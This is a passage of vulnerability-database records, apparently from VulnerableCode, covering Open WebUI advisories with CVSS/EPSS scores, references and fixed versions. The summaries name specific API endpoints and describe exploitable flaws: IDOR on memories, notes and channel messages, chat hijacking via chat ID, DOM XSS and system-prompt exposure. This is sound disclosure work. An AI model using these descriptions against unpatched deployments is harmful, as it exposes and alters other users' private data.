vulnerability VCID-6rbm-rm25-hqgy
16
vulnerability VCID-7j5a-pu4k-kucf
17
vulnerability VCID-7nbc-ng1s-suck
18
vulnerability VCID-8n6u-wgz9-1bgj
19
vulnerability VCID-8nzh-cpda-dkca
20
vulnerability VCID-8y4k-pj2n-8uhm
21
vulnerability VCID-94nj-qkdf-xfhn
22
vulnerability VCID-9jud-sr2a-8yc3
23
vulnerability VCID-chug-ma8r-cucc
24
vulnerability VCID-cw4k-3s8z-uqh8
25
vulnerability VCID-dz6g-jgmg-wqce
26
vulnerability VCID-dzh3-rqx4-fqhv
27
vulnerability VCID-ef1t-pxjm-j7cz
28
vulnerability VCID-hj5f-yk3y-ffdg
29
vulnerability VCID-jfs9-dps1-27a2
30
vulnerability VCID-jnsg-u9dy-r3d5
31
vulnerability VCID-k17g-bd9g-67f7
32
vulnerability VCID-k9jf-5jzd-pkge
33
vulnerability VCID-mn21-kwuu-w7by
34
vulnerability VCID-n4ma-zcpv-5fbp
35
vulnerability VCID-nxvm-97r4-6ybz
36
vulnerability VCID-pkds-1xgn-q3bv
37
vulnerability VCID-pvep-chj7-ekeg
38
vulnerability VCID-pwsg-72yy-quhk
39
vulnerability VCID-q682-k826-efhv
40
vulnerability VCID-qgfh-7u8n-y7c7
41
vulnerability VCID-qjt1-zxx8-r7ht
42
vulnerability VCID-r7vt-4bqm-f7hb
43
vulnerability VCID-reqw-pfm8-c7g5
44
vulnerability VCID-rhhj-rccv-87hw
45
vulnerability VCID-s625-eg1w-gfd1
46
vulnerability VCID-t571-d65a-cyb2
47
vulnerability VCID-tz2k-gazs-mqgd
48
vulnerability VCID-u25g-p4nx-gqd1
49
vulnerability VCID-ujye-g4rj-8be5
50
vulnerability VCID-um53-kf7u-kkg6
51
vulnerability VCID-vghe-uuzj-m7cu
52
vulnerability VCID-vkx3-71kv-sugt
53
vulnerability VCID-w2vd-r3hr-w3bt
54
vulnerability VCID-wb88-83cj-ffhy
55
vulnerability VCID-wcz4-vwx4-tufb
56
vulnerability VCID-yug9-shts-kufb
57
vulnerability VCID-yysb-dk2k-f7g4
58
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.5
aliases CVE-2026-45303, GHSA-4vrc-m9ch-6m3r
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-gw77-ux3j-qfaa
36
url VCID-hj5f-yk3y-ffdg
vulnerability_id VCID-hj5f-yk3y-ffdg
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, when setting model permissions so that a group has read access to it, intending for other users to use it, those users also can read the model's system prompt. However users may consider their system prompt confidential, so this is considered a security issue. This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45387
reference_id
reference_type
scores
0
value 0.00026
scoring_system epss
scoring_elements 0.07958
published_at 2026-06-13T12:55:00Z
1
value 0.00026
scoring_system epss
scoring_elements 0.07953
published_at 2026-06-14T12:55:00Z
2
value 0.00026
scoring_system epss
scoring_elements 0.07928
published_at 2026-06-11T12:55:00Z
3
value 0.00026
scoring_system epss
scoring_elements 0.07963
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45387
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45387
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45387
3
reference_url https://github.com/advisories/GHSA-h2cw-7qw9-56xr
reference_id GHSA-h2cw-7qw9-56xr
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-h2cw-7qw9-56xr
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-h2cw-7qw9-56xr
reference_id GHSA-h2cw-7qw9-56xr
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T21:08:24Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-h2cw-7qw9-56xr
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45387, GHSA-h2cw-7qw9-56xr
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hj5f-yk3y-ffdg
37
url VCID-jfs9-dps1-27a2
vulnerability_id VCID-jfs9-dps1-27a2
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, a user just needs to use the API endpoint: /api/chat/completions with their own API key (generated in OWUI) and the Chat ID of another user to continue the conversation of the other user. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45349
reference_id
reference_type
scores
0
value 0.00039
scoring_system epss
scoring_elements 0.12004
published_at 2026-06-14T12:55:00Z
1
value 0.00039
scoring_system epss
scoring_elements 0.11932
published_at 2026-06-11T12:55:00Z
2
value 0.00039
scoring_system epss
scoring_elements 0.12025
published_at 2026-06-13T12:55:00Z
3
value 0.00039
scoring_system epss
scoring_elements 0.12023
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45349
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/cf4218e688def6f11d195aeda6665ae5b5376b67
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/cf4218e688def6f11d195aeda6665ae5b5376b67
3
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45349
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45349
5
reference_url https://github.com/advisories/GHSA-gfm2-xm6c-37qc
reference_id GHSA-gfm2-xm6c-37qc
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gfm2-xm6c-37qc
6
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-gfm2-xm6c-37qc
reference_id GHSA-gfm2-xm6c-37qc
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-19T12:41:10Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-gfm2-xm6c-37qc
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-45349, GHSA-gfm2-xm6c-37qc
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jfs9-dps1-27a2
38
url VCID-jnsg-u9dy-r3d5
vulnerability_id VCID-jnsg-u9dy-r3d5
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. In versions 0.6.34 and below, the functionality that inserts custom prompts into the chat window is vulnerable to DOM XSS when 'Insert Prompt as Rich Text' is enabled, since the prompt body is assigned to the DOM sink .innerHtml without sanitisation. Any user with permissions to create prompts can abuse this to plant a payload that could be triggered by other users if they run the corresponding / command to insert the prompt. This issue is fixed in version 0.6.35.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-64495
reference_id
reference_type
scores
0
value 0.00011
scoring_system epss
scoring_elements 0.01425
published_at 2026-06-14T12:55:00Z
1
value 0.00011
scoring_system epss
scoring_elements 0.0158
published_at 2026-06-13T12:55:00Z
2
value 0.00011
scoring_system epss
scoring_elements 0.01576
published_at 2026-06-12T12:55:00Z
3
value 0.00011
scoring_system epss
scoring_elements 0.01574
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-64495
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-64495
reference_id CVE-2025-64495
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-64495
3
reference_url https://github.com/open-webui/open-webui/commit/eb9c4c0e358c274aea35f21c2856c0a20051e5f1
reference_id eb9c4c0e358c274aea35f21c2856c0a20051e5f1
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-10T15:08:34Z/
url https://github.com/open-webui/open-webui/commit/eb9c4c0e358c274aea35f21c2856c0a20051e5f1
4
reference_url https://github.com/advisories/GHSA-w7xj-8fx7-wfch
reference_id GHSA-w7xj-8fx7-wfch
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-w7xj-8fx7-wfch
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-w7xj-8fx7-wfch
reference_id GHSA-w7xj-8fx7-wfch
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-10T15:08:34Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-w7xj-8fx7-wfch
6
reference_url https://github.com/open-webui/open-webui/blob/7a83e7dfa367d19f762ec17cac5e4a94ea2bd97d/src/lib/components/common/RichTextInput.svelte#L348
reference_id RichTextInput.svelte#L348
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-10T15:08:34Z/
url https://github.com/open-webui/open-webui/blob/7a83e7dfa367d19f762ec17cac5e4a94ea2bd97d/src/lib/components/common/RichTextInput.svelte#L348
fixed_packages
0
url pkg:pypi/open-webui@0.6.35
purl pkg:pypi/open-webui@0.6.35
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4v8w-kv6g-kkbc
9
vulnerability VCID-4x63-8x64-d3bq
10
vulnerability VCID-5319-t7jm-y3bx
11
vulnerability VCID-5jna-wvd7-j7cm
12
vulnerability VCID-5wfg-zqcy-c7ar
13
vulnerability VCID-5wzn-mfwg-ybc3
14
vulnerability VCID-66zh-9jk7-9bfx
15
vulnerability VCID-6rbm-rm25-hqgy
16
vulnerability VCID-7nbc-ng1s-suck
17
vulnerability VCID-8n6u-wgz9-1bgj
18
vulnerability VCID-8nzh-cpda-dkca
19
vulnerability VCID-8y4k-pj2n-8uhm
20
vulnerability VCID-94nj-qkdf-xfhn
21
vulnerability VCID-9jud-sr2a-8yc3
22
vulnerability VCID-chug-ma8r-cucc
23
vulnerability VCID-cw4k-3s8z-uqh8
24
vulnerability VCID-dz6g-jgmg-wqce
25
vulnerability VCID-dzh3-rqx4-fqhv
26
vulnerability VCID-ef1t-pxjm-j7cz
27
vulnerability VCID-hj5f-yk3y-ffdg
28
vulnerability VCID-jfs9-dps1-27a2
29
vulnerability VCID-k9jf-5jzd-pkge
30
vulnerability VCID-n4ma-zcpv-5fbp
31
vulnerability VCID-nxvm-97r4-6ybz
32
vulnerability VCID-pkds-1xgn-q3bv
33
vulnerability VCID-pwsg-72yy-quhk
34
vulnerability VCID-q682-k826-efhv
35
vulnerability VCID-qgfh-7u8n-y7c7
36
vulnerability VCID-qjt1-zxx8-r7ht
37
vulnerability VCID-r7vt-4bqm-f7hb
38
vulnerability VCID-reqw-pfm8-c7g5
39
vulnerability VCID-rhhj-rccv-87hw
40
vulnerability VCID-s625-eg1w-gfd1
41
vulnerability VCID-t571-d65a-cyb2
42
vulnerability VCID-u25g-p4nx-gqd1
43
vulnerability VCID-ujye-g4rj-8be5
44
vulnerability VCID-um53-kf7u-kkg6
45
vulnerability VCID-vghe-uuzj-m7cu
46
vulnerability VCID-vkx3-71kv-sugt
47
vulnerability VCID-w2vd-r3hr-w3bt
48
vulnerability VCID-wb88-83cj-ffhy
49
vulnerability VCID-wcz4-vwx4-tufb
50
vulnerability VCID-yug9-shts-kufb
51
vulnerability VCID-yysb-dk2k-f7g4
52
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.35
aliases CVE-2025-64495, GHSA-w7xj-8fx7-wfch
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jnsg-u9dy-r3d5
39
url VCID-k17g-bd9g-67f7
vulnerability_id VCID-k17g-bd9g-67f7
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.19, authorization controls surrounding the memories API were inconsistent, resulting in the ability of a standard user to delete, restore, and view the contents of other users' memories. Using a newly created non-admin user with no existing memories, it is possible to view existing memories via POST /api/v1/memories/query. Similarly, even if a non-admin user cannot modify another user's memory data via POST /api/v1/memories/{memory_id}/update, the endpoint's response improperly leaks the content of that memory if a valid memory_id is known. The DELETE /api/v1/memories/{memory_id} can also be used by any user to delete an existing memory. Deleted memories can then be restored by calling the POST /api/v1/memories/{memory_id}/update endpoint again. This vulnerability is fixed in 0.6.19.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44570
reference_id
reference_type
scores
0
value 0.00045
scoring_system epss
scoring_elements 0.1431
published_at 2026-06-14T12:55:00Z
1
value 0.00045
scoring_system epss
scoring_elements 0.14217
published_at 2026-06-11T12:55:00Z
2
value 0.00045
scoring_system epss
scoring_elements 0.14336
published_at 2026-06-13T12:55:00Z
3
value 0.00045
scoring_system epss
scoring_elements 0.14337
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44570
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44570
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44570
3
reference_url https://github.com/advisories/GHSA-hmjq-crxp-7rjw
reference_id GHSA-hmjq-crxp-7rjw
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hmjq-crxp-7rjw
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-hmjq-crxp-7rjw
reference_id GHSA-hmjq-crxp-7rjw
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T12:49:23Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-hmjq-crxp-7rjw
fixed_packages
0
url pkg:pypi/open-webui@0.6.19
purl pkg:pypi/open-webui@0.6.19
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4v8w-kv6g-kkbc
9
vulnerability VCID-4x63-8x64-d3bq
10
vulnerability VCID-5319-t7jm-y3bx
11
vulnerability VCID-5jna-wvd7-j7cm
12
vulnerability VCID-5wfg-zqcy-c7ar
13
vulnerability VCID-5wzn-mfwg-ybc3
14
vulnerability VCID-66zh-9jk7-9bfx
15
vulnerability VCID-6rbm-rm25-hqgy
16
vulnerability VCID-7j5a-pu4k-kucf
17
vulnerability VCID-7nbc-ng1s-suck
18
vulnerability VCID-8n6u-wgz9-1bgj
19
vulnerability VCID-8nzh-cpda-dkca
20
vulnerability VCID-8y4k-pj2n-8uhm
21
vulnerability VCID-94nj-qkdf-xfhn
22
vulnerability VCID-9jud-sr2a-8yc3
23
vulnerability VCID-chug-ma8r-cucc
24
vulnerability VCID-cw4k-3s8z-uqh8
25
vulnerability VCID-dz6g-jgmg-wqce
26
vulnerability VCID-dzh3-rqx4-fqhv
27
vulnerability VCID-ef1t-pxjm-j7cz
28
vulnerability VCID-hj5f-yk3y-ffdg
29
vulnerability VCID-jfs9-dps1-27a2
30
vulnerability VCID-jnsg-u9dy-r3d5
31
vulnerability VCID-k9jf-5jzd-pkge
32
vulnerability VCID-n4ma-zcpv-5fbp
33
vulnerability VCID-nxvm-97r4-6ybz
34
vulnerability VCID-pkds-1xgn-q3bv
35
vulnerability VCID-pvep-chj7-ekeg
36
vulnerability VCID-pwsg-72yy-quhk
37
vulnerability VCID-q682-k826-efhv
38
vulnerability VCID-qgfh-7u8n-y7c7
39
vulnerability VCID-qjt1-zxx8-r7ht
40
vulnerability VCID-r7vt-4bqm-f7hb
41
vulnerability VCID-reqw-pfm8-c7g5
42
vulnerability VCID-rhhj-rccv-87hw
43
vulnerability VCID-s625-eg1w-gfd1
44
vulnerability VCID-t571-d65a-cyb2
45
vulnerability VCID-u25g-p4nx-gqd1
46
vulnerability VCID-ujye-g4rj-8be5
47
vulnerability VCID-um53-kf7u-kkg6
48
vulnerability VCID-vghe-uuzj-m7cu
49
vulnerability VCID-vkx3-71kv-sugt
50
vulnerability VCID-w2vd-r3hr-w3bt
51
vulnerability VCID-wb88-83cj-ffhy
52
vulnerability VCID-wcz4-vwx4-tufb
53
vulnerability VCID-yug9-shts-kufb
54
vulnerability VCID-yysb-dk2k-f7g4
55
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.19
aliases CVE-2026-44570, GHSA-hmjq-crxp-7rjw
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k17g-bd9g-67f7
40
url VCID-k9jf-5jzd-pkge
vulnerability_id VCID-k9jf-5jzd-pkge
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.11, the API /api/v1/notes/{note_id} endpoint lacks proper authorization checks, allowing authenticated users to retrieve notes belonging to other users by guessing or enumerating UUIDs. This results in unauthorized disclosure of potentially sensitive or private user data. This vulnerability is fixed in 0.8.11.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45666
reference_id
reference_type
scores
0
value 0.00033
scoring_system epss
scoring_elements 0.10269
published_at 2026-06-14T12:55:00Z
1
value 0.00033
scoring_system epss
scoring_elements 0.10234
published_at 2026-06-11T12:55:00Z
2
value 0.00033
scoring_system epss
scoring_elements 0.10286
published_at 2026-06-13T12:55:00Z
3
value 0.00033
scoring_system epss
scoring_elements 0.10283
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45666
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/de3317e26bb67a2a7ea015a183bbd1d369880ebd
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/de3317e26bb67a2a7ea015a183bbd1d369880ebd
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45666
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45666
4
reference_url https://github.com/advisories/GHSA-x3qm-p8hr-3c3h
reference_id GHSA-x3qm-p8hr-3c3h
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-x3qm-p8hr-3c3h
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-x3qm-p8hr-3c3h
reference_id GHSA-x3qm-p8hr-3c3h
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T16:14:44Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-x3qm-p8hr-3c3h
fixed_packages
0
url pkg:pypi/open-webui@0.8.11
purl pkg:pypi/open-webui@0.8.11
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-8nzh-cpda-dkca
13
vulnerability VCID-8y4k-pj2n-8uhm
14
vulnerability VCID-chug-ma8r-cucc
15
vulnerability VCID-cw4k-3s8z-uqh8
16
vulnerability VCID-dz6g-jgmg-wqce
17
vulnerability VCID-dzh3-rqx4-fqhv
18
vulnerability VCID-ef1t-pxjm-j7cz
19
vulnerability VCID-hj5f-yk3y-ffdg
20
vulnerability VCID-jfs9-dps1-27a2
21
vulnerability VCID-n4ma-zcpv-5fbp
22
vulnerability VCID-nxvm-97r4-6ybz
23
vulnerability VCID-pkds-1xgn-q3bv
24
vulnerability VCID-q682-k826-efhv
25
vulnerability VCID-qgfh-7u8n-y7c7
26
vulnerability VCID-qjt1-zxx8-r7ht
27
vulnerability VCID-r7vt-4bqm-f7hb
28
vulnerability VCID-reqw-pfm8-c7g5
29
vulnerability VCID-rhhj-rccv-87hw
30
vulnerability VCID-s625-eg1w-gfd1
31
vulnerability VCID-t571-d65a-cyb2
32
vulnerability VCID-vghe-uuzj-m7cu
33
vulnerability VCID-vkx3-71kv-sugt
34
vulnerability VCID-w2vd-r3hr-w3bt
35
vulnerability VCID-wcz4-vwx4-tufb
36
vulnerability VCID-yug9-shts-kufb
37
vulnerability VCID-yysb-dk2k-f7g4
38
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.11
aliases CVE-2026-45666, GHSA-x3qm-p8hr-3c3h
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k9jf-5jzd-pkge
41
url VCID-mn21-kwuu-w7by
vulnerability_id VCID-mn21-kwuu-w7by
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.19, there's an IDOR in the channels message management system that allows authenticated users to modify or delete any message within channels they have read access to. The vulnerability exists in the message update and delete endpoints, which implement channel-level authorization but completely lack message ownership validation. While the frontend correctly implements ownership checks (showing edit/delete buttons only for message owners or admins), the backend APIs bypass these protections by only validating channel access permissions without verifying that the requesting user owns the target message. This creates a client-side security control bypass where attackers can directly call the APIs to modify other users' messages. This vulnerability is fixed in 0.6.19.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44569
reference_id
reference_type
scores
0
value 0.00036
scoring_system epss
scoring_elements 0.11225
published_at 2026-06-12T12:55:00Z
1
value 0.00036
scoring_system epss
scoring_elements 0.11183
published_at 2026-06-14T12:55:00Z
2
value 0.00036
scoring_system epss
scoring_elements 0.1116
published_at 2026-06-11T12:55:00Z
3
value 0.00036
scoring_system epss
scoring_elements 0.11217
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44569
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44569
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44569
3
reference_url https://github.com/advisories/GHSA-jxwr-g6r6-j3fx
reference_id GHSA-jxwr-g6r6-j3fx
reference_type
scores
0
